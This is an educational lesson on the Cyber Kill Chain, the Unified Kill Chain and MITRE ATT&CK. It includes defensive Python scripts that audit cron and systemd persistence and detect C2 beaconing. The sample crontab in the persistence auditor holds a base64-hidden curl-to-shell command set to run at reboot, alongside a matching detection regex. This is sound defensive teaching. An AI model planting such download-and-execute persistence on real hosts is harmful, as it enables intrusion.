
The Kill Chain concept in cybersecurity

Reading time: 5 min


The "Kill Chain" concept, like many in cybersecurity, comes from the military world: it describes the sequence of steps an adversary must complete to reach a target, with the corollary that breaking any link in the chain stops the attack.

In cyber security, this concept belongs to the field of Cyber Threat Intelligence (CTI), which studies attackers (their tools, techniques and behaviour) in order to defend against them better.

The "Kill Chain" concept has been formalised in two different frameworks, which we will discover in this lesson.

Cyber Kill Chain

The "Cyber Kill Chain" framework was published in 2011 by Lockheed Martin (Hutchins, Cloppert and Amin). In the "Cyber Kill Chain", a cyber attack is broken down into 7 chronological steps:

  • Reconnaissance
  • Weaponization
  • Delivery
  • Exploitation
  • Installation
  • Command & Control (Remote control)
  • Actions on Objectives (Final Goal)

[Figure: the seven phases of the Cyber Kill Chain]

Reconnaissance

In this first phase, the attacker tries to collect as much information as possible about his target.

Technical information (domain names, IP addresses, exposed services) is gathered with tools, but the attacker also relies on Open Source Intelligence (OSINT) to collect publicly available information, for example on social networks or news sites (e-mail addresses, names and roles of employees). Passive collection of this kind leaves no trace on the target's systems, which is why this phase is so hard for the defender to observe; only active probing (port scans, vulnerability scans) can be detected.

Weaponization

Once the attacker knows his victim well, he can assemble an arsenal suited to his plan.

He can choose among existing tools (for example legitimate administration tools that are diverted from their intended purpose), buy malicious software, or develop his own tools. The result is typically a payload (a malicious document, a trojanised installer, an exploit) coupled with the implant that will run once it is opened.

Delivery

Once the arsenal is ready, the attacker must find a way to transfer all or part of it (the payload) to the victim.

Several delivery channels are commonly used; among the best known:

  • a phishing e-mail carrying a malicious attachment or a link to a booby-trapped site.
  • compromise of a supplier or of a software update (supply chain).
  • physical social engineering, for example dropping a booby-trapped USB key in the company car park.

Delivery is the first phase in which the attacker touches the target's infrastructure, and therefore the first in which the defender has a realistic chance of detecting or blocking the attack (mail filtering, attachment sandboxing, USB device control).

Exploitation

In this phase the delivered payload is executed: it exploits a vulnerability in an application or operating system, or simply relies on the user opening it, and gives the attacker initial access (a foothold) on the target's information system.

Installation

After gaining initial access, the attacker must now work to keep that access (persistence).

The aim is that if the connection is lost (after a system reboot, for example), he does not have to repeat the previous phases to get back in.

There are several techniques for maintaining access to the target:

  • Backdoor or implant.
  • Scheduled task (Windows) or cron job (Linux).
  • Web shell on web servers.
  • Adding a malicious service (Windows service or systemd unit).
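Two of the persistence mechanisms listed above, cron jobs and services, live in text files that a defender can audit. The script below is an added example written for this lesson (it is not code from the page or from any product): it parses a constructed crontab and a constructed systemd unit file, applies a few heuristics that typically betray malicious persistence (execution from a world-writable directory, hidden dot-prefixed paths, base64 decoded at run time, a download piped straight into a shell), and decodes embedded base64 so that the same checks are applied to the hidden payload. All file contents, hostnames and paths are invented.

```python
"""Audit cron and systemd persistence entries for common red flags.

Added example: the crontab and unit file below are constructed inputs, not
taken from a real host, and the checks are heuristics (a clean result is
not proof that nothing persists).
"""
import base64
import re

# Constructed inputs. The @reboot entry hides a "download and pipe to shell"
# one-liner inside a base64 blob, a common way to dodge naive grep-based audits.
_ENCODED = base64.b64encode(b"curl http://example.invalid/p.sh | sh").decode()

SAMPLE_CRONTAB = f"""\
# m h dom mon dow command
0 2 * * * /usr/bin/apt-get update -q
*/5 * * * * /tmp/.x/update.sh
@reboot bash -c "$(echo {_ENCODED} | base64 -d)"
30 3 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
"""

SAMPLE_UNIT = """\
[Unit]
Description=System Update Helper

[Service]
ExecStart=/dev/shm/.svc/agent --daemon
Restart=always

[Install]
WantedBy=multi-user.target
"""

WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
HIDDEN_PATH_RE = re.compile(r"/\.[^/\s]")                         # /tmp/.x/, /dev/shm/.svc/
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b")
B64_BLOB_RE = re.compile(r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{16,}={0,2})")
EXEC_RE = re.compile(r"^Exec(?:Start|StartPre|StartPost|Stop)=[-@+!:]*(.*)$")


def command_reasons(command, depth=0):
    """Return the reasons a command line looks like malicious persistence."""
    reasons = []
    if any(d in command for d in WORLD_WRITABLE):
        reasons.append("runs from a world-writable directory")
    if HIDDEN_PATH_RE.search(command):
        reasons.append("uses a hidden (dot-prefixed) path")
    if PIPE_TO_SHELL_RE.search(command):
        reasons.append("downloads content and pipes it into a shell")
    # Decode embedded base64 once and apply the same checks to the payload.
    if depth == 0 and "base64" in command and ("-d" in command or "--decode" in command):
        reasons.append("decodes a base64 blob at runtime")
        for blob in B64_BLOB_RE.findall(command):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
            except ValueError:                 # binascii.Error is a ValueError
                continue
            reasons += ["decoded payload " + r for r in command_reasons(decoded, depth + 1)]
    return reasons


def parse_crontab(text):
    """Return (schedule, command) pairs; comments and blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                      # @reboot, @daily, ...
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)              # 5 time fields + command
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        entries.append((schedule, command))
    return entries


def parse_unit_exec_lines(text):
    """Return the command of every Exec* directive in a systemd unit file."""
    matches = (EXEC_RE.match(line.strip()) for line in text.splitlines())
    return [m.group(1) for m in matches if m]


def audit_persistence(crontab_text, unit_text):
    """Return suspicious entries as (source, command, reasons) tuples."""
    findings = []
    for schedule, command in parse_crontab(crontab_text):
        if reasons := command_reasons(command):
            findings.append(("cron " + schedule, command, reasons))
    for command in parse_unit_exec_lines(unit_text):
        if reasons := command_reasons(command):
            findings.append(("systemd Exec", command, reasons))
    return findings


if __name__ == "__main__":
    for source, command, reasons in audit_persistence(SAMPLE_CRONTAB, SAMPLE_UNIT):
        print(f"[{source}] {command}")
        for reason in reasons:
            print("    -", reason)
```

On a real host you would feed it the output of `crontab -l` for every user, the files under /etc/cron.d, and the unit files under /etc/systemd/system, and compare the findings against a known-good baseline: these heuristics catch lazy persistence, not an attacker who hides a service behind a plausible name and a path in /usr/local.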

Command & Control (Remote control)

The attacker now wants to work efficiently on the compromised machine, often starting from limited initial access.

He therefore uses a command and control tool (abbreviated C2 or C&C): the implant on the victim calls back to a server the attacker controls, usually over a protocol that blends in with normal traffic (HTTPS, DNS), and the attacker drives it remotely from an interface prepared for the operation.

Among the best known Command and Control frameworks:

  • Cobalt Strike
  • Empire
  • Nighthawk

Because the implant typically polls its server at a fixed interval (a "beacon"), the regularity of outbound connections is one of the classic indicators defenders look for at this stage.
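The beaconing behaviour described above can be spotted in ordinary proxy logs without any signature for the C2 framework itself. The script below is an added example written for this lesson, not code from the page or from any of the frameworks named: it builds a constructed log (invented IPs and hostnames) containing one implant that checks in roughly every 60 seconds and one user browsing a news site, groups connections by source and destination, and flags pairs whose inter-request intervals have a low coefficient of variation (standard deviation divided by mean). The thresholds are assumptions to tune, not values taken from any product.

```python
"""Flag beacon-like outbound traffic by the regularity of its timing.

Added example: the proxy log below is constructed (invented hosts and IPs),
and the threshold values are starting points to tune, not vendor defaults.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import statistics


def _build_sample_log():
    """Constructed log lines: '<ISO timestamp> <src_ip> <dst_host> <bytes>'."""
    base = datetime(2024, 1, 15, 9, 0, 0)
    lines = []
    # Implant on 10.0.0.5 checking in every 60 s with a few seconds of jitter.
    for i, jitter in enumerate([0, 2, -1, 3, -2, 1, -3, 2, 0, -1]):
        ts = base + timedelta(seconds=60 * i + jitter)
        lines.append(f"{ts.isoformat()} 10.0.0.5 cdn-update.invalid 512")
    # A user browsing a news site: bursts and long idle gaps, varying sizes.
    offsets = [0, 7, 90, 95, 400, 403, 405, 1200, 1800, 1805]
    sizes = [4096, 220, 38000, 1200, 900, 17000, 512, 2600, 77000, 3100]
    for offset, size in zip(offsets, sizes):
        ts = base + timedelta(seconds=offset)
        lines.append(f"{ts.isoformat()} 10.0.0.7 news.example {size}")
    return "\n".join(sorted(lines))


SAMPLE_LOG = _build_sample_log()


def parse_log(text):
    """Parse log text into (timestamp, src, dst, bytes) tuples."""
    records = []
    for line in text.splitlines():
        ts, src, dst, size = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(size)))
    return records


def beacon_candidates(records, min_events=8, max_cv=0.15):
    """Return (src, dst, mean_interval_s, cv) for src->dst pairs whose
    inter-request intervals are suspiciously regular.

    cv is the coefficient of variation (stdev / mean) of the intervals:
    near 0 for a metronome-like beacon, well above 1 for human browsing.
    """
    times_by_pair = defaultdict(list)
    for ts, src, dst, _ in records:
        times_by_pair[(src, dst)].append(ts)

    candidates = []
    for (src, dst), times in times_by_pair.items():
        if len(times) < min_events:            # too few samples to judge
            continue
        times.sort()
        intervals = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.fmean(intervals)
        if mean <= 0:
            continue
        cv = statistics.pstdev(intervals) / mean
        if cv <= max_cv:
            candidates.append((src, dst, round(mean, 1), round(cv, 3)))
    return candidates


if __name__ == "__main__":
    for src, dst, mean, cv in beacon_candidates(parse_log(SAMPLE_LOG)):
        print(f"possible beacon: {src} -> {dst} every ~{mean}s (cv={cv})")
```

Real C2 frameworks let the operator add random jitter to the sleep interval precisely to defeat this check, so in practice you raise max_cv, look at the constancy of request sizes as a second signal, and keep only pairs that persist for hours. Legitimate periodic traffic (software update checks, telemetry, NTP) produces exactly the same timing signature, so known destinations must be allowlisted before this is turned into an alert.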

Actions on Objectives (Final Goal)

The last step for the attacker is of course to achieve his objectives. Now that he has access to the victim's information system, he typically reaches his goal through intermediate steps:

  • Lateral movement (pivoting to other machines)
  • Internal reconnaissance
  • Privilege escalation

and then the final objective itself, for example:

  • Espionage (theft of data)
  • Ransom (encrypting data and extorting payment)
Unified Kill Chain

The Unified Kill Chain (abbreviated to UKC) is another kill-chain framework tailored to cyber security.

[Figure: the 18 phases of the Unified Kill Chain]

This framework, complementary to the "Cyber Kill Chain", was first published in 2017 by Paul Pols and is much more detailed, consisting of 18 phases.

Note that these 18 phases are not all systematically carried out during an attack, and an attacker may loop back through earlier phases (for example repeating reconnaissance and exploitation from inside the network after pivoting). They are grouped into three main stages, which we will now discuss.

Stage "In"

The "In" stage covers the attacker's initial access and contains the following phases:

  • Reconnaissance.
  • Weaponization.
  • Social Engineering.
  • Exploitation.
  • Persistence.
  • Defense Evasion.
  • Command & Control.

Stage "Through"

The "Through" stage is where the attacker extends his control over the target's information system; the phases are the following:

  • Pivoting.
  • Discovery (internal reconnaissance).
  • Privilege Escalation.
  • Execution.
  • Credential Access.
  • Lateral Movement.

Stage "Out"

Just like in the last stage of the "Cyber Kill Chain", the attacker now has the access needed to achieve his objectives. The last phases of the "Unified Kill Chain" are:

  • Access.
  • Collection.
  • Exfiltration.
  • Impact.
  • Objectives.

The MITRE ATT&CK framework

MITRE ATT&CK is not strictly a kill chain but a continuously updated knowledge base of adversary tactics, techniques and procedures (TTPs) observed in real intrusions. Its tactics (Reconnaissance, Initial Access, Execution, Persistence, and so on through to Impact) follow roughly the same order as the kill-chain phases, and each technique is linked to the threat groups and tools known to use it, which makes it possible to visualise how already known attackers operate and to map your own detections against them.

A complete course is available on Seela to learn how to use the MITRE ATT&CK framework.
